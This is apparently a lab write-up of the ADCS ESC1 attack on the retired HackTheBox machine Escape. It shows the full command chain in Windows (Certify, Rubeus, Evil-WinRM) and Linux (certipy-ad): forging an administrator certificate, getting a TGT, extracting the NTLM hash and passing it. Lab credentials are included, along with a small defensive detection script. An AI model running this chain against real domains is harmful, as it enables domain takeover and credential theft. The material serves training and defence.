In this series I will be replicating Active Directory Certificate Services attacks in both Windows and Linux environments. Today we focus on ESC1, using a retired HackTheBox machine (Escape).
The username for initial access is ryan.cooper and the password is NuclearMosquito3.
Active Directory Certificate Services (ADCS) ESC1
ESC1 is a template misconfiguration that lets a low-privileged user (here ryan.cooper) request a certificate while specifying an arbitrary Subject Alternative Name (SAN). It occurs when a template has the ENROLLEE_SUPPLIES_SUBJECT flag set, includes an Extended Key Usage (EKU) that permits authentication (such as Client Authentication), requires neither manager approval nor authorized signatures, and grants enrollment rights to low-privileged principals. By exploiting this, an attacker requests a certificate and injects the identity of a high-privileged account (such as a Domain Administrator) into the SAN field. Because the Certificate Authority trusts the requester's input, it signs the certificate, handing the attacker a valid cryptographic credential that can be used to impersonate the administrator and take full control of the domain.
Note: you could also impersonate any other user on the domain using this technique (it doesn't always have to be the administrator).
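To make those preconditions concrete, here is an added audit check (my example, not part of the original post and not Certify or Certipy code) that parses Certipy-style template output and reports which ESC1 preconditions a template meets. The sample template text is constructed from the UserAuthentication values shown later on this page; the list of low-privileged groups and the set of value-less section headers are assumptions.

```python
# Enrollment principals treated as low-privileged (assumption: tune this for your domain).
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}
# EKUs that let a certificate be used for logon (an empty EKU list also counts: any purpose).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}
SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}  # assumed layout
# Constructed sample modelled on the page's UserAuthentication template (indentation stripped).
SAMPLE = r"""
Enrollee Supplies Subject : True
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Authorized Signatures Required : 0
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
"""

def parse_template(text):
    """Parse 'Key : Value' lines; a line without ' : ' continues the previous key's value list."""
    fields, last = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS:
            continue
        if " : " in line:
            key, value = (s.strip() for s in line.split(" : ", 1))
            fields[key] = [value]
            last = key
        elif last:
            fields[last].append(line)
    return fields

def check_esc1(fields):
    """Return (vulnerable, reasons); ESC1 requires all five preconditions at once."""
    reasons = []
    if fields.get("Enrollee Supplies Subject") == ["True"]:
        reasons.append("enrollee supplies the subject, so the SAN is requester-chosen")
    ekus = fields.get("Extended Key Usage", [])
    if not ekus or any(e in AUTH_EKUS for e in ekus):
        reasons.append("EKU permits authentication: " + (", ".join(ekus) or "<none>"))
    if fields.get("Requires Manager Approval") == ["False"]:
        reasons.append("no manager approval required")
    if fields.get("Authorized Signatures Required") == ["0"]:
        reasons.append("no authorized signatures required")
    low = sorted({p.split("\\", 1)[-1] for p in fields.get("Enrollment Rights", [])} & LOW_PRIV)
    if low:
        reasons.append("low-privileged principals can enroll: " + ", ".join(low))
    return len(reasons) == 5, reasons
```

Any single missing precondition (manager approval turned on, the subject flag cleared, enrollment restricted) drops the result to not vulnerable, which is exactly what the remediation options for this template look like.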
ESC1 Attack in Windows
In the first phase, we used Certify.exe to scan the Active Directory environment for weak certificate templates and identified a template named "UserAuthentication" that is vulnerable to ESC1.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ./Certify.exe enum-templates --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
[X] AuthWithChannelBinding HTTP request for URL 'http://dc.sequel.htb/certsrv/' failed with error: An error occurred while sending the request.
[X] AuthWithChannelBinding HTTP request for URL 'https://dc.sequel.htb/certsrv/' failed with error: An error occurred while sending the request.
[*] Listing info about the enterprise certificate authority 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
User Specifies SAN : Disabled
RPC Request Encryption : Enabled
CA Permissions
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[*] Certificate templates found using the current filter parameters:
Template Name : UserAuthentication
Enabled : True
Publishing CAs : dc.sequel.htb\sequel-DC-CA
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Certificate Name Flag : ENROLLEE_SUPPLIES_SUBJECT
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies : Client Authentication, Encrypting File System, Secure Email
Vulnerabilities
ESC1 : The template has a client authentication EKU and allows enrollees to supply subject.
<SNIP>

Once we had confirmed the vulnerability, we requested a certificate from sequel-DC-CA (the Enterprise CA Name shown above) using the vulnerable template (the Template Name, UserAuthentication, shown above).
By including the --upn administrator@sequel.htb flag, we instructed the CA to generate a digital identity that claims we are the Domain Administrator. Because of the ESC1 flaw, the CA issues the certificate to our current user context, yet the certificate carries the Subject Alternative Name of the administrative account.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request --ca dc.sequel.htb\sequel-DC-CA --template UserAuthentication --upn administrator@sequel.htb
[*] Action: Request a certificate
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Subject Alt Name(s) : administrator@sequel.htb
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 13
[*] Certificate (PFX) :
<SNIP>
Certify completed in 00:00:13.4561300

The output from Certify v2.0 is a raw, Base64-encoded PFX blob, which isn't directly usable as a file. We use PowerShell to decode that string into raw bytes and write them to a file named Admin.pfx. This bridging step is needed because it turns the text-based output of the issued certificate into a cryptographic file that we can feed into Rubeus for the Kerberos exchange.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> $Base64Blob = '<SNIP>'
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> $Bytes = [System.Convert]::FromBase64String($Base64Blob)
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> [System.IO.File]::WriteAllBytes("$pwd\Admin.pfx", $Bytes)
Now, with the forged certificate in hand, we used Rubeus.exe to perform PKINIT (Public Key Cryptography for Initial Authentication). By providing the .pfx file, we asked the Domain Controller to exchange the certificate for a Ticket Granting Ticket (TGT) for the Administrator account. Because we added the /getcredentials flag, Rubeus also performed a User-to-User (U2U) exchange and extracted the Administrator's NTLM hash from the PAC credential information in the Kerberos response.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:administrator /certificate:Admin.pfx /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::d9ec:38a5:d866:984e%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
<SNIP>
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 5/11/2026 1:17:09 AM
EndTime : 5/11/2026 11:17:09 AM
RenewTill : 5/18/2026 1:17:09 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : 4rHEtaRS6ylsisTgpICWGQ==
ASREP (key) : 1C43C51140DD999AB5CF6DDA5EB63748
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE

In the final stage, we used the extracted NTLM hash to gain remote access to the target. Instead of needing a plaintext password, we used Evil-WinRM to perform a Pass-the-Hash (PtH) logon against the target IP.
┌──(root㉿user)-[/home/user]
└─# evil-winrm -i $target -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator

ESC1 Attack in Linux
We began with certipy-ad find to enumerate the ADCS environment. The -vulnerable and -enable flags restrict the output to templates that are both enabled and misconfigured. The output explicitly flagged the "UserAuthentication" template for ESC1, noting that it allows the enrollee to supply a subject name and also permits Client Authentication.
┌──(root㉿user)-[/home/…/HTBox/CPTS/HTBox/tools]
└─# certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -dc-ip $target -vulnerable -enable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2022-11-18T21:10:22+00:00
Template Last Modified : 2024-01-19T00:26:38+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
<SNIP>

Before requesting the certificate, we used certipy-ad account to read the Administrator user's attributes, specifically its objectSid (S-1-5-21...-500). This is a proactive step: since the certificate-mapping hardening introduced by KB5014754, domain controllers can require the account's SID to be embedded in the certificate (in the SID security extension or a URL-form SAN) before accepting it for logon, so we gathered it to make sure the request would hold up even against a patched DC.
┌──(root㉿user)-[/tmp/escape]
└─# certipy-ad account -u Ryan.Cooper -p 'NuclearMosquito3' -dc-ip $target -user 'administrator' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=sequel,DC=htb
name : Administrator
objectSid : S-1-5-21-4078382237-1492182817-2568127209-500
sAMAccountName : Administrator
userAccountControl : 1114624
whenCreated : 2022-11-18T17:11:51+00:00
whenChanged : 2026-03-25T05:01:30+00:00

We executed the exploit with certipy-ad req, which submits the certificate request over RPC. By including both -upn administrator@sequel.htb and the -sid gathered in the previous step, we had the Certificate Authority issue a certificate whose SAN and SID both name the Domain Administrator. Certipy generated the private key itself and saved the certificate and key together in a single administrator.pfx file.
┌──(root㉿user)-[/tmp/escape]
└─# certipy-ad req \
-u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' \
-dc-ip $target -target 'dc.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

We then used certipy-ad auth to authenticate directly to the Domain Controller with the new certificate. This command performed the Kerberos PKINIT exchange to obtain a Ticket Granting Ticket (TGT) and saved it as a credential cache. Crucially, Certipy then retrieved the Administrator's NT hash (a52f78...) by decrypting the PAC credential information returned for the PKINIT logon, the same technique Rubeus's /getcredentials flag used above, so no password change was needed.
┌──(root㉿user)-[/tmp/escape]
└─# certipy-ad auth -pfx 'administrator.pfx' -dc-ip $target
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

You can now use the hash to authenticate as the administrator (as shown above with Evil-WinRM), or use wmiexec or psexec if you are in a more restrictive environment.